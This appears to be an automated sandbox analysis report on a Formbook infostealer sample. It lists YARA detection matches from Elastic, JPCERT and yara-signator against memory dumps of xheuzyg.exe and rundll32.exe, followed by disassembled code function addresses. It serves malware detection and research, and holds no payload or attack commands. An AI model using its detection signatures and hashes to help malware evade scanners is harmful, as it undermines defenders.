          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: xheuzyg.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: xheuzyg.exe PID: 1664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 4312, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_004063540_2_00406354
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_004048020_2_00404802
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00406B2B0_2_00406B2B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B385E2_2_001B385E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B40C82_2_001B40C8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001C40C52_2_001C40C5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001AFA472_2_001AFA47
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B34462_2_001B3446
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B3C932_2_001B3C93
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001BF5102_2_001BF510
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001BFD592_2_001BFD59
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B16002_2_001B1600
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B2F4A2_2_001B2F4A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_013808B72_2_013808B7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_01380A422_2_01380A42
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B385E4_2_001B385E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B40C84_2_001B40C8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001C40C54_2_001C40C5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001AFA474_2_001AFA47
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B34464_2_001B3446
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B3C934_2_001B3C93
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001BF5104_2_001BF510
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001BFD594_2_001BFD59
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B16004_2_001B1600
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001B2F4A4_2_001B2F4A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D8254_2_0041D825
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_004010264_2_00401026
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041DA1D4_2_0041DA1D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041DAE74_2_0041DAE7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041ED3D4_2_0041ED3D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041D5934_2_0041D593
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0041DD974_2_0041DD97
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00409E4C4_2_00409E4C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00409E504_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016581584_2_01658158
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C01004_2_015C0100
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166A1184_2_0166A118
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016881CC4_2_016881CC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016901AA4_2_016901AA
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016841A24_2_016841A2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016620004_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168A3524_2_0168A352
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016903E64_2_016903E6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE3F04_2_015DE3F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016702744_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016502C04_2_016502C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D05354_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016905914_2_01690591
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016824464_2_01682446
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016744204_2_01674420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167E4F64_2_0167E4F6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F47504_2_015F4750
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D07704_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CC7C04_2_015CC7C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EC6E04_2_015EC6E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E69624_2_015E6962
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0169A9A64_2_0169A9A6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A04_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DA8404_2_015DA840
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D28404_2_015D2840
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE8F04_2_015FE8F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B68B84_2_015B68B8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168AB404_2_0168AB40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01686BD74_2_01686BD7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CEA804_2_015CEA80
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DAD004_2_015DAD00
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166CD1F4_2_0166CD1F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CADE04_2_015CADE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E8DBF4_2_015E8DBF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0C004_2_015D0C00
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0CF24_2_015C0CF2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670CB54_2_01670CB5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01644F404_2_01644F40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01612F284_2_01612F28
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01672F304_2_01672F30
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F0F304_2_015F0F30
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C2FC84_2_015C2FC8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DCFE04_2_015DCFE0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164EFA04_2_0164EFA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0E594_2_015D0E59
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168EE264_2_0168EE26
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168EEDB4_2_0168EEDB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2E904_2_015E2E90
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168CE934_2_0168CE93
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0169B16B4_2_0169B16B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0160516C4_2_0160516C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BF1724_2_015BF172
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DB1B04_2_015DB1B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016870E94_2_016870E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168F0E04_2_0168F0E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D70C04_2_015D70C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167F0CC4_2_0167F0CC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BD34C4_2_015BD34C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168132D4_2_0168132D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0161739A4_2_0161739A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016712ED4_2_016712ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EB2C04_2_015EB2C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D52A04_2_015D52A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016875714_2_01687571
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016995C34_2_016995C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166D5B04_2_0166D5B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C14604_2_015C1460
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168F43F4_2_0168F43F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168F7B04_2_0168F7B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016156304_2_01615630
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016816CC4_2_016816CC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D99504_2_015D9950
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EB9504_2_015EB950
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016659104_2_01665910
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163D8004_2_0163D800
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D38E04_2_015D38E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168FB764_2_0168FB76
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01645BF04_2_01645BF0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0160DBF94_2_0160DBF9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EFB804_2_015EFB80
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01643A6C4_2_01643A6C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168FA494_2_0168FA49
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01687A464_2_01687A46
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167DAC64_2_0167DAC6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01615AA04_2_01615AA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01671AA34_2_01671AA3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166DAAC4_2_0166DAAC
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01687D734_2_01687D73
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D3D404_2_015D3D40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01681D5A4_2_01681D5A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EFDC04_2_015EFDC0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01649C324_2_01649C32
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168FCF24_2_0168FCF2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168FF094_2_0168FF09
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D1F924_2_015D1F92
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168FFB14_2_0168FFB1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D9EB04_2_015D9EB0
          Source: C:\Windows\explorer.exeCode function: 5_2_10B4F2325_2_10B4F232
          Source: C:\Windows\explorer.exeCode function: 5_2_10B450825_2_10B45082
          Source: C:\Windows\explorer.exeCode function: 5_2_10B4E0365_2_10B4E036
          Source: C:\Windows\explorer.exeCode function: 5_2_10B525CD5_2_10B525CD
          Source: C:\Windows\explorer.exeCode function: 5_2_10B49B305_2_10B49B30
          Source: C:\Windows\explorer.exeCode function: 5_2_10B49B325_2_10B49B32
          Source: C:\Windows\explorer.exeCode function: 5_2_10B4C9125_2_10B4C912
          Source: C:\Windows\explorer.exeCode function: 5_2_10B46D025_2_10B46D02
          Source: C:\Windows\explorer.exeCode function: 5_2_111E39125_2_111E3912
          Source: C:\Windows\explorer.exeCode function: 5_2_111DDD025_2_111DDD02
          Source: C:\Windows\explorer.exeCode function: 5_2_111E95CD5_2_111E95CD
          Source: C:\Windows\explorer.exeCode function: 5_2_111E50365_2_111E5036
          Source: C:\Windows\explorer.exeCode function: 5_2_111DC0825_2_111DC082
          Source: C:\Windows\explorer.exeCode function: 5_2_111E0B325_2_111E0B32
          Source: C:\Windows\explorer.exeCode function: 5_2_111E0B305_2_111E0B30
          Source: C:\Windows\explorer.exeCode function: 5_2_111E62325_2_111E6232
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B24466_2_044B2446
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A44206_2_044A4420
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044AE4F66_2_044AE4F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044005356_2_04400535
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044C05916_2_044C0591
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0441C6E06_2_0441C6E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044247506_2_04424750
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044007706_2_04400770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043FC7C06_2_043FC7C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044920006_2_04492000
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044881586_2_04488158
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043F01006_2_043F0100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0449A1186_2_0449A118
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B81CC6_2_044B81CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044C01AA6_2_044C01AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044B41A26_2_044B41A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A02746_2_044A0274
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044802C06_2_044802C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BA3526_2_044BA352
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044C03E66_2_044C03E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0440E3F06_2_0440E3F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04400C006_2_04400C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043F0CF26_2_043F0CF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A0CB56_2_044A0CB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0440AD006_2_0440AD00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0449CD1F6_2_0449CD1F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043FADE06_2_043FADE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04418DBF6_2_04418DBF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04400E596_2_04400E59
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BEE266_2_044BEE26
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BEEDB6_2_044BEEDB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04412E906_2_04412E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044BCE936_2_044BCE93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04474F406_2_04474F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04442F286_2_04442F28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04420F306_2_04420F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044A2F306_2_044A2F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0440CFE06_2_0440CFE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0447EFA06_2_0447EFA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043F2FC86_2_043F2FC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0440A8406_2_0440A840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044028406_2_04402840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043E68B86_2_043E68B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0442E8F06_2_0442E8F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044169626_2_04416962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044029A06_2_044029A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044CA9A66_2_044CA9A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043FEA806_2_043FEA80
